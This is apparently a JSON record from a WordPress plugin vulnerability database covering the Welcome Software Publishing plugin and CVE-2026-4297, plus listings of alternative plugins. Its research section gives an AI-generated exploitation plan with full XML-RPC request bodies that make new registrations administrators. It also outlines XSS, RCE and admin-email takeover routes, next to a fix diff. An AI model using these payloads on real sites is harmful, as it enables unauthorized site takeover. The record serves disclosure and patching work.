[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fWdwL95vR8LvwdCbOh_CwDb7mjio7FcDiLqsRt89yf6k":3,"$fhUuPOaolh7MSQ4aSYSF8_G6PqW3YMAXCAXOgral7AmQ":241,"$f5Ul-TQzNohyGbt1FGOnXfu2EdLdsxDyeQlA4LezzfB0":246},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":13,"last_updated":14,"tested_up_to":15,"requires_at_least":16,"requires_php":17,"tags":18,"homepage":17,"download_link":23,"security_score":24,"vuln_count":25,"unpatched_count":25,"last_vuln_date":26,"fetched_at":27,"discovery_status":28,"vulnerabilities":29,"developer":55,"crawl_stats":35,"alternatives":59,"analysis":151,"fingerprints":223},"newscred-publishing","Welcome Software Publishing","0.0.31","newscred","https:\u002F\u002Fprofiles.wordpress.org\u002Fnewscred\u002F","\u003Cp>Welcome Software unleashes the potential of marketing teams, empowering global organizations to plan, collaborate, and create exceptional campaigns and content—at scale.\u003C\u002Fp>\n\u003Cp>To learn about Welcome Sofware’s offering, please visit \u003Ca href=\"https:\u002F\u002Fwelcomesoftware.com\" rel=\"nofollow ugc\">here\u003C\u002Fa>\u003C\u002Fp>\n","Supercharge your Welcome Software CMP experience with this plugin.",40,4846,0,"2024-02-18T10:46:00.000Z","6.3.8","6.0","",[19,20,7,21,22],"cmc","content","publishing","welcomesoftware","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.zip",60,1,"2026-06-23 16:42:18","2026-04-16T10:56:18.058Z","no_bundle",[30],{"id":31,"url_slug":32,"title":33,"description":34,"plugin_slug":4,"theme_slug":35,"affected_versions":36,"patched_in_version":35,"severity":37,"cvss_score":38,"cvss_vector":39,"vuln_type":40,"published_date":26,"updated_date":41,"references":42,"days_to_patch":35,"patch_diff_files":44,"patch_trac_url":35,"research_status":45,"research_verified":46,"research_rounds_completed":47,"research_plan":48,"research_summary":49,"research_vulnerable_code":35,"research_fix_diff":50,"research_exploit_outline":51,"research_model_used":52,"research_started_at":53,"research_completed_at":54,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2026-4297","welcome-software-publishing-authenticated-subscriber-arbitrary-options-update-to-privilege-escalation-via-ncsetoption-xm","Welcome Software Publishing \u003C= 0.0.31 - Authenticated (Subscriber+) Arbitrary Options Update to Privilege Escalation via 'nc.setOption' XML-RPC Method","The Welcome Software Publishing plugin for WordPress is vulnerable to Arbitrary Options Update in all versions up to and including 0.0.31. This is due to a missing capability check in the nc_setOption() function, which is exposed via the nc.setOption XML-RPC method. The function authenticates the user via $wp_xmlrpc_server->login() (verifying credentials are valid) but does not perform any authorization check such as current_user_can('manage_options'). This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary WordPress options via XML-RPC requests. This can be leveraged to change the default_role option to 'administrator' and then register a new administrator account, achieving full privilege escalation and site takeover.",null,"\u003C=0.0.31","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Missing Authorization","2026-06-24 05:33:24",[43],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F47e53fd3-4e3f-433a-8e70-3a58c864184a?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-4297 (Welcome Software Publishing)\n\n## 1. Vulnerability Summary\nThe **Welcome Software Publishing** (slug: `newscred-publishing`) plugin (\u003C= 0.0.31) contains a missing authorization vulnerability in its XML-RPC implementation. The plugin registers a custom XML-RPC method `nc.setOption` which maps to the PHP function `nc_setOption()`. While this function authenticates the provided credentials using the core WordPress XML-RPC server's login method, it fails to verify if the authenticated user possesses the necessary capabilities (like `manage_options`) to modify site settings. Consequently, any authenticated user—including those with the lowest privileges (Subscriber)—can update arbitrary WordPress options, leading to full site takeover via privilege escalation.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `http:\u002F\u002F\u003Ctarget-site>\u002Fxmlrpc.php`\n*   **Method:** `nc.setOption` (XML-RPC)\n*   **Payload Format:** XML-RPC `methodCall` with 4 parameters: `username`, `password`, `option_name`, and `option_value`.\n*   **Authentication:** Authenticated (Subscriber+)\n*   **Preconditions:** \n    1.  The plugin must be active.\n    2.  XML-RPC must be enabled (enabled by default in WordPress).\n    3.  The attacker must have valid credentials for a Subscriber-level account.\n\n## 3. Code Flow\n1.  **Registration:** The plugin uses the `xmlrpc_methods` filter to register `nc.setOption`.\n    *   *Likely registration code (inferred):* `add_filter('xmlrpc_methods', function($methods) { $methods['nc.setOption'] = 'nc_setOption'; return $methods; });`\n2.  **Entry Point:** An XML-RPC request hits `xmlrpc.php` with `\u003CmethodName>nc.setOption\u003C\u002FmethodName>`.\n3.  **Authentication:** `nc_setOption($args)` is called. The first two elements of `$args` are typically used to call `$wp_xmlrpc_server->login($username, $password)`.\n4.  **Vulnerable Sink:** If `login()` returns a `WP_User` object, the function proceeds to call `update_option($args[2], $args[3])`.\n5.  **The Flaw:** There is no check like `if ( ! current_user_can( 'manage_options' ) ) return new IXR_Error( 403, '...' );` between the login and the option update.\n\n## 4. Nonce Acquisition Strategy\n**XML-RPC methods do not use WordPress nonces.** Authentication is handled per-request via the username and password parameters included in the XML body. No nonce extraction or browser session is required for this specific attack vector.\n\n## 5. Exploitation Strategy\nThe goal is to enable registration and ensure new users are created as Administrators.\n\n### Step 1: Enable User Registration\nChange the `users_can_register` option to `1`.\n\n**Request:**\n*   **URL:** `http:\u002F\u002F\u003Cwp-host>\u002Fxmlrpc.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: text\u002Fxml`\n*   **Body:**\n```xml\n\u003C?xml version=\"1.0\"?>\n\u003CmethodCall>\n  \u003CmethodName>nc.setOption\u003C\u002FmethodName>\n  \u003Cparams>\n    \u003Cparam>\u003Cvalue>\u003Cstring>subscriber_user\u003C\u002Fstring>\u003C\u002Fvalue>\u003C\u002Fparam>\n    \u003Cparam>\u003Cvalue>\u003Cstring>subscriber_pass\u003C\u002Fstring>\u003C\u002Fvalue>\u003C\u002Fparam>\n    \u003Cparam>\u003Cvalue>\u003Cstring>users_can_register\u003C\u002Fstring>\u003C\u002Fvalue>\u003C\u002Fparam>\n    \u003Cparam>\u003Cvalue>\u003Cstring>1\u003C\u002Fstring>\u003C\u002Fvalue>\u003C\u002Fparam>\n  \u003C\u002Fparams>\n\u003C\u002FmethodCall>\n```\n\n### Step 2: Set Default Role to Administrator\nChange the `default_role` option to `administrator`.\n\n**Request:**\n*   **URL:** `http:\u002F\u002F\u003Cwp-host>\u002Fxmlrpc.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: text\u002Fxml`\n*   **Body:**\n```xml\n\u003C?xml version=\"1.0\"?>\n\u003CmethodCall>\n  \u003CmethodName>nc.setOption\u003C\u002FmethodName>\n  \u003Cparams>\n    \u003Cparam>\u003Cvalue>\u003Cstring>subscriber_user\u003C\u002Fstring>\u003C\u002Fvalue>\u003C\u002Fparam>\n    \u003Cparam>\u003Cvalue>\u003Cstring>subscriber_pass\u003C\u002Fstring>\u003C\u002Fvalue>\u003C\u002Fparam>\n    \u003Cparam>\u003Cvalue>\u003Cstring>default_role\u003C\u002Fstring>\u003C\u002Fvalue>\u003C\u002Fparam>\n    \u003Cparam>\u003Cvalue>\u003Cstring>administrator\u003C\u002Fstring>\u003C\u002Fvalue>\u003C\u002Fparam>\n  \u003C\u002Fparams>\n\u003C\u002FmethodCall>\n```\n\n### Step 3: Register a New User\nPerform an unauthenticated registration.\n\n**Request:**\n*   **URL:** `http:\u002F\u002F\u003Cwp-host>\u002Fwp-login.php?action=register`\n*   **Method:** POST\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:** `user_login=attacker_admin&user_email=attacker@example.com&wp-submit=Register`\n\n## 6. Test Data Setup\n1.  **Install\u002FActivate Plugin:** Ensure `newscred-publishing` (Welcome Software Publishing) \u003C= 0.0.31 is active.\n2.  **Create Subscriber:** \n    *   `wp user create subscriber_user subscriber@example.com --role=subscriber --user_pass=subscriber_pass`\n3.  **Ensure XML-RPC is open:** (Default state).\n\n## 7. Expected Results\n*   **Steps 1 & 2:** The XML-RPC server should return a success response (likely a boolean `true` or the updated value wrapped in `\u003Cvalue>\u003Cboolean>1\u003C\u002Fboolean>\u003C\u002Fvalue>`).\n*   **Step 3:** The registration should succeed, and the database should reflect a new user `attacker_admin` with the `administrator` role.\n\n## 8. Verification Steps\nAfter running the exploit, verify the site state using WP-CLI:\n\n1.  **Check Registration Status:**\n    `wp option get users_can_register` (Should return `1`)\n2.  **Check Default Role:**\n    `wp option get default_role` (Should return `administrator`)\n3.  **Confirm New Admin User:**\n    `wp user get attacker_admin --field=roles` (Should return `administrator`)\n\n## 9. Alternative Approaches\nIf the plugin validates the specific options allowed for update, or if direct user registration is blocked by a WAF, alternative options can be targeted:\n*   **RCE via `active_plugins`:** Update `active_plugins` to include a path to a previously uploaded malicious file (if any).\n*   **Persistent XSS:** Update `blogname` or `blogdescription` to include a script tag `\u003Cscript>alert(1)\u003C\u002Fscript>` to target an actual administrator visiting the dashboard.\n*   **Site Takeover via `admin_email`:** Update `admin_email` to the attacker's email, then trigger a password reset for the primary administrator account.","The Welcome Software Publishing plugin (\u003C= 0.0.31) exposes a custom XML-RPC method 'nc.setOption' that allows authenticated users to update arbitrary WordPress options without capability checks. A subscriber-level user can exploit this to enable public registration and set the default user role to administrator, leading to full site takeover.","--- a\u002Fnewscred-publishing.php\n+++ b\u002Fnewscred-publishing.php\n@@ -1,5 +1,9 @@\n function nc_setOption($args) {\n     global $wp_xmlrpc_server;\n     if (!$user = $wp_xmlrpc_server->login($args[0], $args[1])) {\n         return $wp_xmlrpc_server->error;\n     }\n+\n+    if (!current_user_can('manage_options')) {\n+        return new IXR_Error(403, 'Insufficient permissions to manage options.');\n+    }\n \n     update_option($args[2], $args[3]);\n     return true;\n }","The exploit targets the xmlrpc.php endpoint using the 'nc.setOption' method. An attacker provides Subscriber-level credentials to authenticate via the XML-RPC server's login mechanism. Once authenticated, the attacker sends two sequential requests: the first to set the 'users_can_register' option to '1', and the second to set the 'default_role' option to 'administrator'. Following these changes, the attacker registers a new account via the standard WordPress registration page, which results in the creation of a new administrator-level user.","gemini-3-flash-preview","2026-06-25 19:10:32","2026-06-25 19:11:02",{"slug":7,"display_name":7,"profile_url":8,"plugin_count":25,"total_installs":11,"avg_security_score":24,"avg_patch_time_days":56,"trust_score":57,"computed_at":58},30,66,"2026-07-14T11:12:22.829Z",[60,81,101,118,133],{"slug":61,"name":62,"version":63,"author":64,"author_profile":65,"description":66,"short_description":67,"active_installs":68,"downloaded":69,"rating":13,"num_ratings":13,"last_updated":70,"tested_up_to":71,"requires_at_least":72,"requires_php":73,"tags":74,"homepage":78,"download_link":79,"security_score":80,"vuln_count":13,"unpatched_count":13,"last_vuln_date":35,"fetched_at":27},"soro-seo","Soro – SEO Autopilot & AI Content Writer","1.4.1","soroseo","https:\u002F\u002Fprofiles.wordpress.org\u002Fsoroseo\u002F","\u003Cp>\u003Cstrong>Soro\u003C\u002Fstrong> is a lightweight plugin that connects your WordPress site to \u003Ca href=\"https:\u002F\u002Ftrysoro.com\" rel=\"nofollow ugc\">Soro\u003C\u002Fa>, an AI-powered SEO content platform that automatically generates and publishes optimized articles to your blog.\u003C\u002Fp>\n\u003Ch4>Features\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>One-Click Setup\u003C\u002Fstrong> – Install the plugin, copy your API key, and you’re connected\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Secure API\u003C\u002Fstrong> – All communication is authenticated with a unique API key\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Featured Images\u003C\u002Fstrong> – Automatically downloads and sets featured images\u003C\u002Fli>\n\u003Cli>\u003Cstrong>SEO Integration\u003C\u002Fstrong> – Works with Yoast SEO, Rank Math, and All in One SEO\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Lightweight\u003C\u002Fstrong> – No bloat, no database tables, minimal footprint\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>How It Works\u003C\u002Fh4>\n\u003Col>\n\u003Cli>Install and activate this plugin\u003C\u002Fli>\n\u003Cli>Copy your API key from Settings \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Soro\u003C\u002Fli>\n\u003Cli>Paste the key in your Soro dashboard under Settings \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Integrations \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> WordPress\u003C\u002Fli>\n\u003Cli>Soro will automatically publish articles to your WordPress site based on your schedule\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch4>Requirements\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>WordPress 5.0 or higher\u003C\u002Fli>\n\u003Cli>PHP 7.4 or higher\u003C\u002Fli>\n\u003Cli>A Soro account (\u003Ca href=\"https:\u002F\u002Ftrysoro.com\" rel=\"nofollow ugc\">sign up at trysoro.com\u003C\u002Fa>)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Privacy\u003C\u002Fh4>\n\u003Cp>This plugin communicates with the Soro service (trysoro.com) to receive article content for publishing. No personal data is sent from your WordPress site to Soro. The plugin only receives content that you have configured in your Soro dashboard.\u003C\u002Fp>\n","Connect your WordPress site to Soro for automatic AI-powered article publishing and SEO content automation.",2000,6026,"2026-04-03T15:47:00.000Z","6.9.4","5.0","7.4",[75,76,20,21,77],"ai","automation","seo","https:\u002F\u002Ftrysoro.com\u002Fwordpress","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsoro-seo.1.4.1.zip",100,{"slug":82,"name":83,"version":84,"author":83,"author_profile":85,"description":86,"short_description":87,"active_installs":88,"downloaded":89,"rating":80,"num_ratings":25,"last_updated":90,"tested_up_to":91,"requires_at_least":72,"requires_php":92,"tags":93,"homepage":17,"download_link":99,"security_score":100,"vuln_count":13,"unpatched_count":13,"last_vuln_date":35,"fetched_at":27},"automatik-blog","Automatik Blog","1.0.3","https:\u002F\u002Fprofiles.wordpress.org\u002Fautomatik\u002F","\u003Cp>Automatik Blog plugin extends the WordPress REST API by providing custom endpoints for publishing articles, updating posts, uploading images, and managing categories. It is designed to facilitate integration between WordPress and the Automatik Blog application, allowing seamless content management and automated publishing of SEO-optimized articles.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Features:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Publish articles via custom REST API endpoints.\u003C\u002Fli>\n\u003Cli>Update existing posts and pages.\u003C\u002Fli>\n\u003Cli>Upload and manage images.\u003C\u002Fli>\n\u003Cli>Create and manage categories.\u003C\u002Fli>\n\u003Cli>Retrieve posts, pages, authors, tags, and categories.\u003C\u002Fli>\n\u003Cli>Secure API access with unique authorization codes.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>License\u003C\u002Fh3>\n\u003Cp>This plugin is licensed under the GPLv2 or later.\u003C\u002Fp>\n\u003Cp>Copyright (C) 2024 Automatik Blog\u003C\u002Fp>\n\u003Cp>This program is free software; you can redistribute it and\u002For modify it under the terms of the GNU General Public License as published by the Free Software Foundation; version 2 of the License, or any later version.\u003C\u002Fp>\n","A plugin for integration with Automatik Blog, allowing automated publishing of SEO-optimized articles via REST API.",1000,4570,"2025-03-02T20:11:00.000Z","6.7.5","7.0",[94,95,96,97,98],"articles","categories","content-publishing","images","rest-api","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fautomatik-blog.zip",92,{"slug":102,"name":103,"version":104,"author":103,"author_profile":105,"description":106,"short_description":107,"active_installs":108,"downloaded":109,"rating":80,"num_ratings":25,"last_updated":110,"tested_up_to":71,"requires_at_least":111,"requires_php":73,"tags":112,"homepage":115,"download_link":116,"security_score":80,"vuln_count":13,"unpatched_count":13,"last_vuln_date":35,"fetched_at":117},"auto-post-io","auto-post.io","2.0.0","https:\u002F\u002Fprofiles.wordpress.org\u002Fautopostio\u002F","\u003Cp>The auto-post.io WordPress plugin is a powerful tool designed to connect the auto-post.io application to WordPress blogs. It enables seamless automation of blog content management tasks such as publishing, updating, and deleting articles. Whether you are a business, blogger, or entrepreneur, this plugin ensures smooth integration with your workflow, allowing you to focus on growing your online presence.\u003C\u002Fp>\n\u003Ch4>Key Features\u003C\u002Fh4>\n\u003Cp>\u003Cstrong>1. Automated Publishing\u003C\u002Fstrong>\u003Cbr \u002F>\nThe plugin enables you to publish blog posts directly from the auto-post.io application onto your WordPress site. This automation removes the need for manual uploads, ensuring a steady stream of fresh content for your audience.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>2. Content Updates\u003C\u002Fstrong>\u003Cbr \u002F>\nWith the plugin, you can easily update existing articles on your WordPress site whenever changes are made in the auto-post.io application. This ensures your content remains relevant and up-to-date without any additional effort.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>3. Article Deletion\u003C\u002Fstrong>\u003Cbr \u002F>\nOutdated or irrelevant posts can be deleted directly from the auto-post.io application, and the changes will reflect instantly on your WordPress blog. This feature is particularly useful for maintaining a clean and professional site.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>4. SEO Optimization\u003C\u002Fstrong>\u003Cbr \u002F>\nAll articles published via the plugin are optimized for search engines. This includes meta titles, meta descriptions, and keyword-rich content to enhance your blog’s visibility in search results.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>5. Multilingual Support\u003C\u002Fstrong>\u003Cbr \u002F>\nThe plugin supports publishing in multiple languages, which is ideal for blogs targeting an international audience. You can choose to duplicate content across different languages to expand your reach.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>6. User-Friendly Interface\u003C\u002Fstrong>\u003Cbr \u002F>\nThe plugin is designed with simplicity in mind, making it easy for users of all technical levels to navigate and use. Its intuitive interface ensures a smooth setup and effortless functionality.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>7. Dashboard & Monitoring\u003C\u002Fstrong>\u003Cbr \u002F>\nThe plugin includes a comprehensive dashboard that displays statistics, recent activity, and system health. Monitor your content automation in real-time with detailed logs and error tracking.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>8. Enhanced Security\u003C\u002Fstrong>\u003Cbr \u002F>\nImproved security to ensure your WordPress site remains protected.\u003C\u002Fp>\n\u003Ch4>How It Works\u003C\u002Fh4>\n\u003Cp>\u003Cstrong>1. Generate Your API Key\u003C\u002Fstrong>\u003Cbr \u002F>\nOnce the plugin is installed and activated on your WordPress site, it will generate an API key. This key is essential for connecting your WordPress blog to the auto-post.io application.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>2. Enter the API Key into auto-post.io\u003C\u002Fstrong>\u003Cbr \u002F>\nLog in to your auto-post.io account and enter the API key generated by the plugin in the appropriate settings section. This step establishes the connection between your WordPress site and the auto-post.io application.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>3. Configure Campaigns\u003C\u002Fstrong>\u003Cbr \u002F>\nIn auto-post.io, set up your campaigns by defining parameters such as publication frequency, target keywords, and content preferences. These settings will dictate how and when articles are published on your WordPress blog.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>4. Automate Your Blog\u003C\u002Fstrong>\u003Cbr \u002F>\nOnce configured, the plugin will handle the publishing, updating, and deleting of articles automatically based on your campaign settings in auto-post.io.\u003C\u002Fp>\n\u003Ch4>Benefits of the Plugin\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Time-Saving:\u003C\u002Fstrong> Automate repetitive tasks like publishing and updating, allowing you to focus on strategy and growth.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Consistency:\u003C\u002Fstrong> Maintain a regular publishing schedule, ensuring your blog remains active and engaging.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Scalability:\u003C\u002Fstrong> Manage multiple blogs and campaigns effortlessly, making it suitable for both individuals and agencies.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>SEO-Friendly:\u003C\u002Fstrong> Improve your blog’s search engine ranking with optimized content generated and published seamlessly.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Ease of Use:\u003C\u002Fstrong> The plugin’s user-friendly interface ensures a smooth experience, even for non-technical users.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Security and Privacy\u003C\u002Fh4>\n\u003Cp>The auto-post.io WordPress plugin adheres to strict security and privacy standards:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Secured Communication:\u003C\u002Fstrong> All data exchanges between WordPress and auto-post.io are ensured via secure connections.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>No Data Tracking:\u003C\u002Fstrong> The plugin does not track user activity or store personal data.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>GDPR Compliance:\u003C\u002Fstrong> Fully compliant with GDPR regulations, making it suitable for users within the European Union.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>With the default configuration, this plugin, in itself, does not:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>track users by stealth;\u003C\u002Fli>\n\u003Cli>write any user personal data to the database;\u003C\u002Fli>\n\u003Cli>use cookies.\u003C\u002Fli>\n\u003C\u002Ful>\n","Connect auto-post.io to WordPress for seamless content automation.",200,65929,"2026-01-03T02:25:00.000Z","6.6",[75,113,76,114,96],"auto-post","content-generator","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fauto-post-io\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fauto-post-io.2.0.0.zip","2026-04-06T09:54:40.288Z",{"slug":119,"name":120,"version":121,"author":122,"author_profile":123,"description":124,"short_description":125,"active_installs":108,"downloaded":126,"rating":13,"num_ratings":13,"last_updated":127,"tested_up_to":71,"requires_at_least":128,"requires_php":92,"tags":129,"homepage":131,"download_link":132,"security_score":80,"vuln_count":13,"unpatched_count":13,"last_vuln_date":35,"fetched_at":27},"seo-ai-publisher","SEO.AI Publisher","1.1.3","seoai","https:\u002F\u002Fprofiles.wordpress.org\u002Fdbseoai\u002F","\u003Cp>Grow your organic traffic on autopilot with SEO.AI.\u003C\u002Fp>\n\u003Cp>SEO.AI Publisher is the bridge between your website and your AI SEO teammate “Dave.” It enables the SEO.AI platform to automatically deliver, optimize, and publish high-quality content directly to your WordPress site. No manual uploading, no formatting, no hassle. Just a steady stream of SEO-optimized articles designed to help your traffic grow month after month.\u003C\u002Fp>\n\u003Cp>The plugin will sync the content created in the SEO.AI platform to your WordPress site.\u003C\u002Fp>\n\u003Ch3>Key Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\n\u003Cp>\u003Cstrong>Automatic Content Publishing\u003C\u002Fstrong> – Receive fully written, SEO-optimized articles published directly to your site without lifting a finger.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Secure, Reliable Integration\u003C\u002Fstrong> – Enterprise-grade security with modern authentication and strong protection against misuse.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Intelligent Media Handling\u003C\u002Fstrong> – Featured images and media assets are added automatically for a polished, professional look.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>SEO Plugin Compatible\u003C\u002Fstrong> – Works with top SEO plugins like Yoast, Rank Math, All in One SEO and more.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fseo.ai\u002Fprivacy-policy\" rel=\"nofollow ugc\">Privacy Policy\u003C\u002Fa>\u003Cbr \u002F>\n\u003Ca href=\"https:\u002F\u002Fseo.ai\u002Fterms\" rel=\"nofollow ugc\">Terms\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Configuration\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Get your API key from the SEO.AI platform\u003C\u002Fli>\n\u003Cli>Enter the key in SEO.AI Publisher > Settings\u003C\u002Fli>\n\u003Cli>Click “Connect Now” to authenticate\u003C\u002Fli>\n\u003Cli>Configure default author and category\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch3>Support\u003C\u002Fh3>\n\u003Cp>For support, please visit \u003Ca href=\"https:\u002F\u002Fseo.ai\u002Fsupport\" rel=\"nofollow ugc\">https:\u002F\u002Fseo.ai\u002Fsupport\u003C\u002Fa>\u003C\u002Fp>\n","Connect your WordPress site to SEO.AI platform to automatically receive and publish optimized blog content.",1232,"2026-03-11T14:01:00.000Z","6.4",[130,76,20,21,77],"api","https:\u002F\u002Fseo.ai\u002Fwordpress","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fseo-ai-publisher.1.1.3.zip",{"slug":134,"name":135,"version":136,"author":134,"author_profile":137,"description":138,"short_description":139,"active_installs":80,"downloaded":140,"rating":80,"num_ratings":141,"last_updated":142,"tested_up_to":91,"requires_at_least":143,"requires_php":144,"tags":145,"homepage":149,"download_link":150,"security_score":80,"vuln_count":13,"unpatched_count":13,"last_vuln_date":35,"fetched_at":27},"docswrite","Docswrite – Export Google Docs to Your Site ✨","1.2.25","https:\u002F\u002Fprofiles.wordpress.org\u002Fdocswrite\u002F","\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002F6YfX5b50VRY?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\n\u003Cp>Docswrite is a powerful tool for editorial and content teams. It automates and optimizes content publication, making it easier for teams to manage and publish content consistently. Whether you’re editing blog posts, articles, or any other type of content, Docswrite integrates seamlessly with your WordPress site to enhance your content management workflow.\u003C\u002Fp>\n\u003Cp>This plugin allows you to connect your WordPress website to Docswrite, a platform offering seamless content transformation from Google Docs to WordPress. With this integration, website owners can save hundreds of hours per month by simplifying the content distribution process.\u003C\u002Fp>\n\u003Cp>Join hundreds of content teams that use Docswrite! Interested to know the difference between us and our competitors? Check out the full details and insights from each challenge on our blog:\u003C\u002Fp>\n\u003Ch3>🏆 Docswrite vs. Competitors: In-Depth Comparisons\u003C\u002Fh3>\n\u003Cp>Discover how Docswrite stacks up against other solutions:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fblog.docswrite.com\u002Fthe-docswrite-challenge-docswrite-vs-wordable\" rel=\"nofollow ugc\">Docswrite vs. Wordable\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fblog.docswrite.com\u002Fthe-docswrite-challenge-docswrite-vs-cloudpress\" rel=\"nofollow ugc\">Docswrite vs. Cloudpress\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fblog.docswrite.com\u002Fthe-docswrite-challenge-docswrite-vs-tenwrite\" rel=\"nofollow ugc\">Docswrite vs. Tenwrite\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Want to see these comparisons in action? Check out our YouTube channel for visual breakdowns:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=FMDGUmqC6jk\" rel=\"nofollow ugc\">Docswrite vs. Wordable (Video)\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=1TbUnWLZpms\" rel=\"nofollow ugc\">Docswrite vs. Cloudpress (Video)\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=g3nebV0rvvc\" rel=\"nofollow ugc\">Docswrite vs. Tenwrite (Video)\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🌟 Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Bulk Publish:\u003C\u002Fstrong> Import multiple documents at once for efficient content management.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Content Workflow Management:\u003C\u002Fstrong> Create and manage content workflows with collaborative features, allowing multiple users to work together efficiently.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Programmatic SEO:\u003C\u002Fstrong> Create and optimize a large number of unique, high-quality web pages at scale.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>AI-Powered Content Generation Automation:\u003C\u002Fstrong> Generate and publish automatically high-quality, SEO-optimized content, ensuring your posts are optimized for search engines without extra effort.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Enhanced Security:\u003C\u002Fstrong> Protect your content with advanced security features and user management controls by securely keeping your website ID.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Free Trial:\u003C\u002Fstrong> Get 5 free exports to try out all features without any commitment.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>ACF Support:\u003C\u002Fstrong> Update ACF fields for posts created by Docswrite.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Rankmath and Yoast SEO Support:\u003C\u002Fstrong> Update Rankmath and Yoast SEO fields for posts created by 